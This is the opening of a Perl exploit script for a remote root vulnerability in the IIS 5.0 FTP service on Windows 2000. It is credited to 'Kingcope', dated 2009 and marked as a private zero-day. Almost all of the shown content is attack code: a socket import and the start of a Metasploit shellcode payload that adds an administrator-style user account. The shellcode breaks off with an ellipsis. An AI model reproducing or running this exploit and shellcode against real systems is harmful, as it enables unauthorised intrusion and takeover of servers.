# IIS 5.0 FTPd / Remote r00t exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2googlemail.com # Affects IIS6 with stack cookie protection # August 2009 – KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; #metasploit shellcode, adduser “winown:nwoniw” $sc = “\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49” . “\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51” . “\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32” . “\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41” . “\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30” . “\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55” …